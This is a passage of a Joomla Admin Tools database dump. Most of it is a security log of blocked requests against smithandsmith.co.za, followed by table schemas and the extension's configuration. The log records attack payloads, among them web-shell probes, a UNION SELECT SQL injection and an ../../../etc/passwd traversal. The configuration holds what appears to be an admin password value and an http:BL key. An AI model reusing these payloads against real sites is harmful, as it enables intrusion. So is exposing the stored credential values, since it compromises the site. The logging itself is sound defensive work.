18:59:50','185.238.2.74','https://www.smithandsmith.co.za/wp-content/plugins/shell/d2.php','404shield',''),(7875,'2022-08-29 20:08:52','159.242.234.8','https://www.smithandsmith.co.za/wp-content/themes/seotheme/mar.php','404shield',''),(7876,'2022-08-29 20:25:19','109.70.100.20','http://smithandsmith.co.za/contact/','httpbl',''),(7877,'2022-08-29 20:25:21','109.70.100.20','http://smithandsmith.co.za/','httpbl',''),(7878,'2022-08-29 22:58:46','185.243.218.41','https://smithandsmith.co.za/contact/','httpbl',''),(7879,'2022-08-30 03:43:33','148.72.211.177','https://smithandsmith.co.za/wp-login.php','404shield',''),(7880,'2022-08-30 12:14:26','208.67.107.63','https://smithandsmith.co.za/wp-admin/css/','404shield',''),(7881,'2022-08-30 17:44:38','20.39.253.161','https://www.smithandsmith.co.za/wp-content/includes/uploads/Va.php','404shield',''),(7882,'2022-08-30 17:44:38','20.39.253.161','https://www.smithandsmith.co.za/wp-content/uploads/readindex.php','404shield',''),(7883,'2022-08-30 17:44:39','20.39.253.161','https://www.smithandsmith.co.za/wp-content/uploads/small.php','404shield',''),(7884,'2022-08-31 07:31:51','164.90.217.101','https://smithandsmith.co.za/wp-login.php','404shield',''),(7885,'2022-08-31 09:42:24','171.244.134.21','https://smithandsmith.co.za/wp-login.php','404shield',''),(7886,'2022-08-31 22:00:01','8.218.143.243','https://smithandsmith.co.za/wp-login.php','404shield',''),(7887,'2022-08-31 23:44:54','45.229.43.162','http://smithandsmith.co.za/administrator/','adminpw',''),(7888,'2022-08-31 23:44:56','45.229.43.162','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(7889,'2022-08-31 23:44:58','45.229.43.162','https://smithandsmith.co.za/wp-login.php','404shield',''),(7890,'2022-08-31 23:45:04','185.220.101.46','http://smithandsmith.co.za/administrator/','adminpw',''),(7891,'2022-08-31 23:45:09','185.220.101.46','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(7892,'2022-08-31 23:45:15','185.220.101.56','https://smithandsmith.co.za/wp-login.php','404shield',''),(7893,'2022-09-01 16:48:44','194.233.82.114','https://smithandsmith.co.za/wp-login.php','404shield',''),(7894,'2022-09-01 18:06:59','51.103.45.197','https://smithandsmith.co.za/wp-admin/css/','404shield',''),(7895,'2022-09-02 21:22:29','107.189.30.22','http://smithandsmith.co.za/contact/','httpbl',''),(7896,'2022-09-02 21:22:31','107.189.30.22','http://smithandsmith.co.za/','httpbl',''),(7897,'2022-09-03 11:54:16','20.163.111.101','https://smithandsmith.co.za/wp-login.php','404shield',''),(7898,'2022-09-03 11:54:16','20.163.111.101','https://smithandsmith.co.za/wp-login.php','404shield',''),(7899,'2022-09-03 11:54:16','20.163.111.101','https://smithandsmith.co.za/wp-login.php','404shield',''),(7900,'2022-09-03 21:45:16','46.161.27.156','https://smithandsmith.co.za/wp-login.php','404shield',''),(7901,'2022-09-04 00:28:58','20.197.239.51','https://smithandsmith.co.za/wp-content/plugins/dzs-zoomsounds/savepng.php?location=1877.php','404shield',''),(7902,'2022-09-04 01:19:59','51.103.45.197','https://smithandsmith.co.za/wp-admin/css/','404shield',''),(7903,'2022-09-04 08:22:13','64.227.40.128','https://smithandsmith.co.za/wp-login.php','404shield',''),(7904,'2022-09-04 11:18:45','194.38.20.161','https://smithandsmith.co.za/wp-content/plugins/wp-file-manager-pro/lib/php/connector.minimal.php','404shield',''),(7905,'2022-09-04 18:05:43','85.119.122.23','https://smithandsmith.co.za/wp-login.php','404shield',''),(7906,'2022-09-05 07:51:08','185.243.218.41','http://smithandsmith.co.za/contact/','httpbl',''),(7907,'2022-09-05 07:51:09','185.243.218.41','http://smithandsmith.co.za/','httpbl',''),(7908,'2022-09-05 09:52:47','20.163.111.101','https://smithandsmith.co.za/wp-login.php','404shield',''),(7909,'2022-09-05 09:52:47','20.163.111.101','https://smithandsmith.co.za/wp-login.php','404shield',''),(7910,'2022-09-05 09:52:47','20.163.111.101','https://smithandsmith.co.za/wp-login.php','404shield',''),(7911,'2022-09-05 11:57:52','167.235.247.217','https://smithandsmith.co.za/wp-content/plugins/t_file_wp/t_file_wp.php?test=hello','404shield',''),(7912,'2022-09-05 11:58:37','167.235.247.217','https://smithandsmith.co.za/wp-content/plugins/backup_index.php','404shield',''),(7913,'2022-09-05 11:58:47','167.235.247.217','https://smithandsmith.co.za/wp-content/db_cache.php','404shield',''),(7914,'2022-09-06 00:51:40','138.124.187.141','http://smithandsmith.co.za/plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php?extension=menu&view=menu&parent=%22%20UNION%20SELECT%20NULL,NULL,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION(),0x6e75636c65692d74656d706c617465),NULL,NULL,NULL,NULL,NULL--%20aa','sqlishield',''),(7915,'2022-09-06 03:59:38','192.163.195.60','https://smithandsmith.co.za/wp-login.php','404shield',''),(7916,'2022-09-06 16:56:32','194.38.20.161','https://smithandsmith.co.za/wp-content/plugins/super-interactive-maps/sim-wp-admin/pages/manage-maps.php','404shield',''),(7917,'2022-09-06 20:54:23','20.24.21.64','https://smithandsmith.co.za/wp-content/plugins/t_file_wp/t_file_wp.php?test=hello','404shield',''),(7918,'2022-09-06 20:54:58','20.24.21.64','https://smithandsmith.co.za/wp-content/plugins/backup_index.php','404shield',''),(7919,'2022-09-06 20:55:02','20.24.21.64','https://smithandsmith.co.za/wp-content/db_cache.php','404shield',''),(7920,'2022-09-06 23:11:31','185.220.101.169','https://smithandsmith.co.za/contact','httpbl',''),(7921,'2022-09-06 23:11:33','185.220.101.169','https://smithandsmith.co.za/','httpbl',''),(7922,'2022-09-07 15:13:50','174.138.27.137','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(7923,'2022-09-07 20:18:41','161.35.15.73','https://smithandsmith.co.za/wp-login.php','404shield',''),(7924,'2022-09-08 00:21:55','194.38.20.161','https://smithandsmith.co.za/wp-content/plugins/advanced_file_manager_5/php/connector.minimal.php','404shield',''),(7925,'2022-09-08 06:11:09','40.121.254.135','https://smithandsmith.co.za/wp-admin/admin-ajax.php','404shield',''),(7926,'2022-09-08 06:11:17','40.121.254.135','https://smithandsmith.co.za/wp-content/uploads/typehub/custom/pjbrdlzl/.v4.php','404shield',''),(7927,'2022-09-08 06:11:24','40.121.254.135','https://smithandsmith.co.za/wp-admin/admin-ajax.php','404shield',''),(7928,'2022-09-08 07:05:49','20.242.2.0','https://smithandsmith.co.za/wp-admin/css/','404shield',''),(7929,'2022-09-08 10:53:32','3.8.210.226','https://www.smithandsmith.co.za//wp-admin/admin-ajax.php','404shield',''),(7930,'2022-09-08 10:53:34','3.8.210.226','https://www.smithandsmith.co.za//wp-admin/admin-ajax.php','404shield',''),(7931,'2022-09-08 10:53:36','3.8.210.226','https://www.smithandsmith.co.za//wp-admin/admin-post.php','404shield',''),(7932,'2022-09-08 20:35:36','194.163.159.35','https://smithandsmith.co.za/wp-login.php','404shield',''),(7933,'2022-09-08 23:02:59','195.178.120.44','https://smithandsmith.co.za/wp-content/themes/seotheme/mar.php','404shield',''),(7934,'2022-09-08 23:03:07','195.178.120.44','https://smithandsmith.co.za/wp-content/themes/seotheme/mar.php','404shield',''),(7935,'2022-09-09 01:50:49','52.189.225.183','https://www.smithandsmith.co.za/wp-content/includes/uploads/Va.php','404shield',''),(7936,'2022-09-09 01:50:50','52.189.225.183','https://www.smithandsmith.co.za/wp-content/uploads/readindex.php','404shield',''),(7937,'2022-09-09 01:50:51','52.189.225.183','https://www.smithandsmith.co.za/wp-content/uploads/small.php','404shield',''),(7938,'2022-09-09 03:10:33','20.171.66.190','https://smithandsmith.co.za/wp-login.php','404shield',''),(7939,'2022-09-09 03:10:33','20.171.66.190','https://smithandsmith.co.za/wp-login.php','404shield',''),(7940,'2022-09-09 03:10:33','20.171.66.190','https://smithandsmith.co.za/wp-login.php','404shield',''),(7941,'2022-09-09 05:31:06','51.105.36.91','https://smithandsmith.co.za/wp-admin/css/','404shield',''),(7942,'2022-09-09 08:48:58','194.38.20.161','https://smithandsmith.co.za/wp-content/plugins/superstorefinder-wp/css/ssf-wp-pop.css','404shield',''),(7943,'2022-09-09 21:26:35','185.220.101.33','http://smithandsmith.co.za/','httpbl',''),(7944,'2022-09-09 22:51:27','51.255.64.58','https://smithandsmith.co.za/wp-login.php','404shield',''),(7945,'2022-09-09 22:55:23','20.168.45.122','https://smithandsmith.co.za/wp-admin/css/','404shield',''),(7946,'2022-09-10 00:13:28','185.181.61.23','https://smithandsmith.co.za/contact','httpbl',''),(7947,'2022-09-10 00:13:29','185.181.61.23','https://smithandsmith.co.za/','httpbl',''),(7948,'2022-09-10 02:01:44','46.161.27.153','https://smithandsmith.co.za/wp-login.php','404shield',''),(7949,'2022-09-10 13:17:59','35.178.139.27','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(7950,'2022-09-10 13:25:24','35.178.139.27','https://www.smithandsmith.co.za/wp-admin.php','404shield',''),(7951,'2022-09-10 14:56:03','20.172.41.155','https://www.smithandsmith.co.za/wp-content/includes/uploads/Va.php','404shield',''),(7952,'2022-09-10 14:56:17','20.172.41.155','https://www.smithandsmith.co.za/wp-content/uploads/readindex.php','404shield',''),(7953,'2022-09-10 14:56:51','20.172.41.155','https://www.smithandsmith.co.za/wp-content/uploads/small.php','404shield',''),(7954,'2022-09-10 16:41:57','20.172.41.155','https://www.smithandsmith.co.za/wp-admin/style.php','404shield',''),(7955,'2022-09-10 16:42:16','20.172.41.155','https://www.smithandsmith.co.za/wp-content/export.php','404shield',''),(7956,'2022-09-10 16:42:29','20.172.41.155','https://www.smithandsmith.co.za/wp-content/plugins/backup_index.php','404shield',''),(7957,'2022-09-10 17:00:42','52.151.95.67','https://smithandsmith.co.za/wp-admin/css/','404shield',''),(7958,'2022-09-10 21:17:48','159.223.75.51','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(7959,'2022-09-11 00:01:03','194.38.20.161','https://smithandsmith.co.za/wp-content/plugins/superlogoshowcase-wp/sls-wp-admin/pages/exportAjax.php','404shield',''),(7960,'2022-09-11 06:50:54','65.108.56.186','https://smithandsmith.co.za/wp-content/themes/seotheme/mar.php','404shield',''),(7961,'2022-09-11 06:50:59','65.108.56.186','https://smithandsmith.co.za/wp-content/themes/seotheme/mar.php','404shield',''),(7962,'2022-09-11 08:43:05','20.192.11.41','https://smithandsmith.co.za/wp-login.php','404shield',''),(7963,'2022-09-11 08:43:05','20.192.11.41','https://smithandsmith.co.za/wp-login.php','404shield',''),(7964,'2022-09-11 08:43:05','20.192.11.41','https://smithandsmith.co.za/wp-login.php','404shield',''),(7965,'2022-09-11 09:03:31','65.109.4.0','https://smithandsmith.co.za/wp-content/themes/seotheme/mar.php','404shield',''),(7966,'2022-09-11 09:03:35','65.109.4.0','https://smithandsmith.co.za/wp-content/themes/seotheme/mar.php','404shield',''),(7967,'2022-09-11 14:01:41','20.192.11.41','https://smithandsmith.co.za/wp-login.php','404shield',''),(7968,'2022-09-11 14:01:41','20.192.11.41','https://smithandsmith.co.za/wp-login.php','404shield',''),(7969,'2022-09-11 14:01:41','20.192.11.41','https://smithandsmith.co.za/wp-login.php','404shield',''),(7970,'2022-09-11 14:38:22','20.74.83.20','https://smithandsmith.co.za/wp-content/themes/seotheme/mar.php','404shield',''),(7971,'2022-09-11 14:38:27','20.74.83.20','https://smithandsmith.co.za/wp-content/themes/seotheme/mar.php','404shield',''),(7972,'2022-09-11 14:39:49','20.74.83.20','https://www.smithandsmith.co.za/wp-content/themes/seotheme/mar.php','404shield',''),(7973,'2022-09-11 17:39:57','62.210.185.4','https://smithandsmith.co.za/wp-login.php','404shield',''),(7974,'2022-09-12 12:24:06','20.171.66.190','https://smithandsmith.co.za/wp-login.php','404shield',''),(7975,'2022-09-12 12:24:06','20.171.66.190','https://smithandsmith.co.za/wp-login.php','404shield',''),(7976,'2022-09-12 12:24:06','20.171.66.190','https://smithandsmith.co.za/wp-login.php','404shield',''),(7977,'2022-09-12 16:25:40','20.199.72.112','https://smithandsmith.co.za/wp-content/themes/seotheme/mar.php','404shield',''),(7978,'2022-09-12 16:25:43','20.199.72.112','https://smithandsmith.co.za/wp-content/themes/seotheme/mar.php','404shield',''),(7979,'2022-09-12 16:26:20','20.199.72.112','https://www.smithandsmith.co.za/wp-content/themes/seotheme/mar.php','404shield',''),(7980,'2022-09-12 17:35:36','163.172.110.175','https://smithandsmith.co.za/wp-login.php','404shield',''),(7981,'2022-09-12 23:20:22','195.178.120.89','http://smithandsmith.co.za//wp-admin/admin-post.php?local-download=../../../etc/passwd&local-destination-id=../../../etc/passwd','dfishield',''),(7982,'2022-09-13 02:04:29','194.38.20.161','https://smithandsmith.co.za/wp-content/plugins/secure-file-manager/vendor/elfinder/php/connector.minimal.php','404shield',''),(7983,'2022-09-13 10:20:05','5.188.62.140','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7984,'2022-09-13 13:55:44','185.220.101.19','http://smithandsmith.co.za/contact/','httpbl',''),(7985,'2022-09-13 13:55:45','185.220.101.19','http://smithandsmith.co.za/','httpbl',''),(7986,'2022-09-13 19:06:49','192.210.196.65','https://smithandsmith.co.za/wp-login.php','404shield',''),(7987,'2022-09-14 01:58:02','80.76.51.157','https://www.smithandsmith.co.za/wp-content/themes/seotheme/mar.php','404shield',''),(7988,'2022-09-14 01:58:09','80.76.51.157','https://www.smithandsmith.co.za/wp-content/themes/seotheme/mar.php','404shield',''),(7989,'2022-09-14 02:54:15','147.78.47.233','https://smithandsmith.co.za/wp-login.php','404shield',''),(7990,'2022-09-14 07:58:36','185.220.100.250','https://smithandsmith.co.za/contact/','httpbl',''),(7991,'2022-09-14 07:58:41','185.220.100.240','https://smithandsmith.co.za/','httpbl',''),(7992,'2022-09-14 07:58:43','185.220.100.240','https://smithandsmith.co.za/','httpbl',''),(7993,'2022-09-14 07:58:49','185.220.100.240','https://smithandsmith.co.za/','httpbl',''),(7994,'2022-09-14 11:20:27','194.38.20.161','https://smithandsmith.co.za/wp-content/plugins/super-forms/uploads/php/index.php?file=tf2rghf.jpg','404shield',''),(7995,'2022-09-14 14:22:55','20.122.163.70','https://smithandsmith.co.za/wp-admin/includes/class-wp-media-list-data.php','404shield',''),(7996,'2022-09-14 18:20:11','14.116.206.243','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(7997,'2022-09-14 20:11:34','150.95.112.79','https://smithandsmith.co.za/wp-login.php','404shield',''),(7998,'2022-09-15 07:33:23','46.161.27.156','https://smithandsmith.co.za/wp-login.php','404shield',''),(7999,'2022-09-15 17:26:48','119.242.113.207','https://smithandsmith.co.za/wp-login.php','404shield',''),(8000,'2022-09-15 19:31:52','5.188.62.140','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(8001,'2022-09-16 00:22:19','194.38.20.161','https://smithandsmith.co.za/wp-content/themes/SqueezeTheme/style.css','404shield',''),(8002,'2022-09-16 12:31:41','20.0.222.149','https://www.smithandsmith.co.za/wp-admin/style.php','404shield',''),(8003,'2022-09-16 12:31:54','20.0.222.149','https://www.smithandsmith.co.za/wp-content/export.php','404shield',''),(8004,'2022-09-16 12:32:02','20.0.222.149','https://www.smithandsmith.co.za/wp-content/plugins/backup_index.php','404shield',''),(8005,'2022-09-16 18:26:34','18.118.235.21','https://smithandsmith.co.za/wp-login.php','404shield',''),(8006,'2022-09-16 19:47:26','195.178.120.89','http://www.smithandsmith.co.za//wp-admin/admin-post.php?local-download=../../../etc/passwd&local-destination-id=../../../etc/passwd','dfishield',''),(8007,'2022-09-17 05:08:30','147.78.47.233','https://smithandsmith.co.za/wp-login.php','404shield',''),(8008,'2022-09-17 11:51:34','109.70.100.80','http://smithandsmith.co.za/contact/','httpbl',''),(8009,'2022-09-17 17:42:01','208.113.149.124','https://smithandsmith.co.za/wp-login.php','404shield',''),(8010,'2022-09-18 04:09:14','194.38.20.161','https://smithandsmith.co.za/wp-content/themes/OptimizePress/lib/admin/media-upload.php','404shield',''),(8011,'2022-09-18 11:26:12','147.78.47.233','https://smithandsmith.co.za/wp-login.php','404shield',''),(8012,'2022-09-18 19:51:52','103.251.167.21','https://smithandsmith.co.za/contact','httpbl',''),(8013,'2022-09-18 19:51:56','141.98.9.47','https://smithandsmith.co.za/','httpbl',''),(8014,'2022-09-18 21:04:05','152.89.196.13','https://smithandsmith.co.za/wp-content/uploads/nin.php','404shield',''),(8015,'2022-09-18 21:28:00','37.120.165.232','https://smithandsmith.co.za/contact','httpbl',''),(8016,'2022-09-18 21:28:01','37.120.165.232','https://smithandsmith.co.za/','httpbl',''),(8017,'2022-09-18 22:10:20','152.89.196.13','https://smithandsmith.co.za/wp-admin/accesson.php','404shield',''),(8018,'2022-09-19 01:47:58','20.0.222.149','https://www.smithandsmith.co.za/wp-admin/style.php','404shield',''),(8019,'2022-09-19 01:49:42','20.0.222.149','https://www.smithandsmith.co.za/wp-content/export.php','404shield',''),(8020,'2022-09-19 01:50:33','20.0.222.149','https://www.smithandsmith.co.za/wp-content/plugins/backup_index.php','404shield',''),(8021,'2022-09-19 03:22:54','24.41.60.59','https://smithandsmith.co.za/wp-login.php','404shield',''),(8022,'2022-09-19 05:46:16','141.98.9.47','https://smithandsmith.co.za/contact','httpbl',''),(8023,'2022-09-19 05:46:17','213.202.223.95','https://smithandsmith.co.za/','httpbl',''),(8024,'2022-09-19 09:32:26','20.171.80.72','https://www.smithandsmith.co.za/wp-admin/css/','404shield',''),(8025,'2022-09-19 12:51:12','194.38.20.161','https://smithandsmith.co.za/wp-content/themes/optimizepress/lib/admin/media-upload.php','404shield',''),(8026,'2022-09-19 15:41:26','20.171.80.72','https://www.smithandsmith.co.za/wp-admin/style.php','404shield',''),(8027,'2022-09-19 15:42:15','20.171.80.72','https://www.smithandsmith.co.za/wp-content/mu-plugins-old/index.php?f=/NmRtJOUjAdutReQj/scRjKUhleBpzmTyO.txt','404shield',''),(8028,'2022-09-19 15:42:50','20.171.80.72','https://www.smithandsmith.co.za/wp-admin.php?daksldlkdsadas=1','404shield',''),(8029,'2022-09-19 17:49:54','185.220.101.6','https://smithandsmith.co.za/contact/','httpbl',''),(8030,'2022-09-19 18:21:54','185.220.101.36','http://smithandsmith.co.za/contact/','httpbl',''),(8031,'2022-09-19 18:21:55','185.220.101.36','http://smithandsmith.co.za/','httpbl',''),(8032,'2022-09-19 20:48:20','20.0.222.149','https://www.smithandsmith.co.za/wp-admin/style.php','404shield',''),(8033,'2022-09-19 20:48:33','20.0.222.149','https://www.smithandsmith.co.za/wp-content/export.php','404shield',''),(8034,'2022-09-19 20:48:40','20.0.222.149','https://www.smithandsmith.co.za/wp-content/plugins/backup_index.php','404shield',''),(8035,'2022-09-19 21:38:00','5.188.62.140','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(8036,'2022-09-19 23:33:25','103.251.167.10','http://smithandsmith.co.za/contact/','httpbl',''),(8037,'2022-09-19 23:33:26','103.251.167.10','http://smithandsmith.co.za/','httpbl',''),(8038,'2022-09-20 01:48:57','90.156.169.12','https://smithandsmith.co.za/wp-login.php','404shield',''),(8039,'2022-09-20 05:20:54','46.161.27.153','http://smithandsmith.co.za/administrator/','adminpw',''),(8040,'2022-09-20 09:57:06','94.254.74.17','https://smithandsmith.co.za/index.php/component/users','sessionshield',''),(8041,'2022-09-20 16:06:14','148.72.211.177','https://smithandsmith.co.za/wp-login.php','404shield',''),(8042,'2022-09-20 16:32:12','181.90.221.146','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(8043,'2022-09-20 20:47:25','46.161.27.156','http://smithandsmith.co.za/administrator/','adminpw',''),(8044,'2022-09-20 22:52:16','20.14.79.172','http://smithandsmith.co.za//administrator/index.php','adminpw',''),(8045,'2022-09-20 22:52:21','20.14.79.172','https://smithandsmith.co.za//wp-login.php','404shield',''),(8046,'2022-09-20 22:52:23','20.14.79.172','http://smithandsmith.co.za//administrator/index.php','adminpw',''),(8047,'2022-09-21 01:31:27','194.38.20.161','https://smithandsmith.co.za/wp-content/themes/konzept/includes/uploadify/upload.php','404shield','');
/*!40000 ALTER TABLE `vzx9b_admintools_log` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `vzx9b_admintools_profiles`
--
DROP TABLE IF EXISTS `vzx9b_admintools_profiles`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `vzx9b_admintools_profiles` (
`id` int(10) unsigned NOT NULL AUTO_INCREMENT,
`description` varchar(255) NOT NULL,
`configuration` longtext DEFAULT NULL,
`filters` longtext DEFAULT NULL,
PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `vzx9b_admintools_profiles`
--
LOCK TABLES `vzx9b_admintools_profiles` WRITE;
/*!40000 ALTER TABLE `vzx9b_admintools_profiles` DISABLE KEYS */;
INSERT INTO `vzx9b_admintools_profiles` VALUES (1,'Default PHP Change Scanner Profile','','');
/*!40000 ALTER TABLE `vzx9b_admintools_profiles` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `vzx9b_admintools_redirects`
--
DROP TABLE IF EXISTS `vzx9b_admintools_redirects`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `vzx9b_admintools_redirects` (
`id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
`source` varchar(255) DEFAULT NULL,
`dest` varchar(255) DEFAULT NULL,
`ordering` bigint(20) NOT NULL DEFAULT 0,
`published` tinyint(1) NOT NULL DEFAULT 1,
`keepurlparams` tinyint(1) NOT NULL DEFAULT 1,
UNIQUE KEY `id` (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `vzx9b_admintools_redirects`
--
LOCK TABLES `vzx9b_admintools_redirects` WRITE;
/*!40000 ALTER TABLE `vzx9b_admintools_redirects` DISABLE KEYS */;
/*!40000 ALTER TABLE `vzx9b_admintools_redirects` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `vzx9b_admintools_scanalerts`
--
DROP TABLE IF EXISTS `vzx9b_admintools_scanalerts`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `vzx9b_admintools_scanalerts` (
`admintools_scanalert_id` bigint(20) NOT NULL AUTO_INCREMENT,
`path` varchar(2048) NOT NULL,
`scan_id` bigint(20) NOT NULL DEFAULT 0,
`diff` longtext DEFAULT NULL,
`threat_score` int(11) NOT NULL DEFAULT 0,
`acknowledged` tinyint(4) NOT NULL DEFAULT 0,
PRIMARY KEY (`admintools_scanalert_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `vzx9b_admintools_scanalerts`
--
LOCK TABLES `vzx9b_admintools_scanalerts` WRITE;
/*!40000 ALTER TABLE `vzx9b_admintools_scanalerts` DISABLE KEYS */;
/*!40000 ALTER TABLE `vzx9b_admintools_scanalerts` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `vzx9b_admintools_scans`
--
DROP TABLE IF EXISTS `vzx9b_admintools_scans`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `vzx9b_admintools_scans` (
`id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
`description` varchar(255) NOT NULL,
`comment` longtext DEFAULT NULL,
`backupstart` timestamp NOT NULL DEFAULT '0000-00-00 00:00:00',
`backupend` timestamp NOT NULL DEFAULT '0000-00-00 00:00:00',
`status` enum('run','fail','complete') NOT NULL DEFAULT 'run',
`origin` varchar(30) NOT NULL DEFAULT 'backend',
`type` varchar(30) NOT NULL DEFAULT 'full',
`profile_id` bigint(20) NOT NULL DEFAULT 1,
`archivename` longtext DEFAULT NULL,
`absolute_path` longtext DEFAULT NULL,
`multipart` int(11) NOT NULL DEFAULT 0,
`tag` varchar(255) DEFAULT NULL,
`backupid` varchar(255) DEFAULT NULL,
`filesexist` tinyint(3) NOT NULL DEFAULT 1,
`remote_filename` varchar(1000) DEFAULT NULL,
`total_size` bigint(20) NOT NULL DEFAULT 0,
PRIMARY KEY (`id`),
KEY `idx_fullstatus` (`filesexist`,`status`),
KEY `idx_stale` (`status`,`origin`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `vzx9b_admintools_scans`
--
LOCK TABLES `vzx9b_admintools_scans` WRITE;
/*!40000 ALTER TABLE `vzx9b_admintools_scans` DISABLE KEYS */;
/*!40000 ALTER TABLE `vzx9b_admintools_scans` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `vzx9b_admintools_storage`
--
DROP TABLE IF EXISTS `vzx9b_admintools_storage`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `vzx9b_admintools_storage` (
`key` varchar(255) NOT NULL,
`value` longtext NOT NULL,
PRIMARY KEY (`key`(100))
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `vzx9b_admintools_storage`
--
LOCK TABLES `vzx9b_admintools_storage` WRITE;
/*!40000 ALTER TABLE `vzx9b_admintools_storage` DISABLE KEYS */;
INSERT INTO `vzx9b_admintools_storage` VALUES ('cparams','{\"ipworkarounds\":\"0\",\"ipwl\":\"0\",\"ipbl\":\"1\",\"adminpw\":\"webspring\",\"nonewadmins\":\"1\",\"sqlishield\":\"1\",\"antispam\":\"0\",\"custgenerator\":\"1\",\"generator\":\"Drupel\",\"tpone\":1,\"tmpl\":\"1\",\"template\":\"1\",\"logbreaches\":\"1\",\"emailonadminlogin\":\"\",\"emailonfailedadminlogin\":\"\",\"emailbreaches\":\"\",\"muashield\":\"1\",\"csrfshield\":\"-1\",\"rfishield\":\"1\",\"dfishield\":\"1\",\"sessionshield\":\"1\",\"badbehaviour\":0,\"bbstrict\":0,\"bbhttpblkey\":\"jslqqketcths\",\"bbwhitelistip\":\"\",\"tsrenable\":\"1\",\"tsrstrikes\":\"3\",\"tsrnumfreq\":\"10\",\"tsrfrequency\":\"minute\",\"tsrbannum\":\"60\",\"tsrbanfrequency\":\"minute\",\"spammermessage\":\"Your IP has been blocked by our security software. Please contact bevan@webspring.co.za should require assistance.\",\"uploadshield\":\"0\",\"nofesalogin\":\"1\",\"tmplwhitelist\":\"component,system,raw,koowa\",\"neverblockips\":\"\",\"emailafteripautoban\":\"bevan@webspring.co.za\",\"custom403msg\":\"\",\"httpblenable\":\"1\",\"httpblthreshold\":\"25\",\"httpblmaxage\":\"30\",\"httpblblocksuspicious\":\"1\",\"allowsitetemplate\":\"1\",\"trackfailedlogins\":\"1\",\"use403view\":\"0\",\"showpwonloginfailure\":\"1\",\"iplookup\":\"ip-lookup.net\\/index.php?ip={ip}\",\"iplookupscheme\":\"http\",\"saveusersignupip\":\"1\",\"twofactorauth\":0,\"twofactorauth_secret\":\"\",\"twofactorauth_panic\":\"\",\"whitelist_domains\":\".googlebot.com,.search.msn.com\",\"reasons_nolog\":\"geoblocking\",\"reasons_noemail\":\"geoblocking\",\"resetjoomlatfa\":\"0\",\"email_throttle\":\"1\",\"permaban\":\"1\",\"permabannum\":\"2\",\"deactivateusers_num\":0,\"deactivateusers_numfreq\":1,\"deactivateusers_frequency\":\"day\",\"awayschedule_from\":\"22:00\",\"awayschedule_to\":\"06:00\",\"adminlogindir\":\"\",\"blockedemaildomains\":\"\",\"quickstart\":1,\"htconfig\":\"eyJodHRwc2hvc3QiOiJsb2NhbGhvc3QiLCJodHRwaG9zdCI6ImxvY2FsaG9zdCIsInN5bWxpbmtzIjowLCJyZXdyaXRlYmFzZSI6IiIsImZpbGVvcmRlciI6MSwiZXhwdGltZSI6MSwiYXV0b2NvbXByZXNzIjoxLCJmb3JjZWd6aXAiOjEsImF1dG9yb290IjowLCJ3d3dyZWRpciI6MiwiaHN0c2hlYWRlciI6MCwibm9mcmFtZSI6MCwibm90cmFjZXRyYWNrIjoxLCJjb3JzIjowLCJ1dGY4Y2hhcnNldCI6MSwiZXRhZ3R5cGUiOiJkZWZhdWx0Iiwibm9kaXJsaXN0cyI6MSwiZmlsZWluaiI6MSwicGhwZWFzdGVyIjoxLCJub2hvZ2dlcnMiOjEsImxlZnRvdmVycyI6MSwiY2xpY2tqYWNraW5nIjoxLCJyZWR1Y2VtaW1ldHlwZXJpc2tzIjoxLCJyZWZsZWN0ZWR4c3MiOjEsIm5vc2VydmVyc2lnbmF0dXJlIjoxLCJub3RyYW5zZm9ybSI6MSwiaG9nZ2VyYWdlbnRzIjpbIldlYkJhbmRpdCIsIndlYmJhbmRpdCIsIkFjdW5ldGl4IiwiYmlubGFyIiwiQmxhY2tXaWRvdyIsIkJvbHQgMCIsIkJvdCBtYWlsdG86Y3JhZnRib3RAeWFob28uY29tIiwiQk9UIGZvciBKQ0UiLCJjYXNwZXIiLCJjaGVja3ByaXZhY3kiLCJDaGluYUNsYXciLCJjbHNodHRwIiwiY21zd29ybGRtYXAiLCJjb21vZG8iLCJDdXN0byIsIkRlZmF1bHQgQnJvd3NlciAwIiwiZGlhdm9sIiwiRElJYm90IiwiRElTQ28iLCJkb3Rib3QiLCJEb3dubG9hZCBEZW1vbiIsImVDYXRjaCIsIkVpckdyYW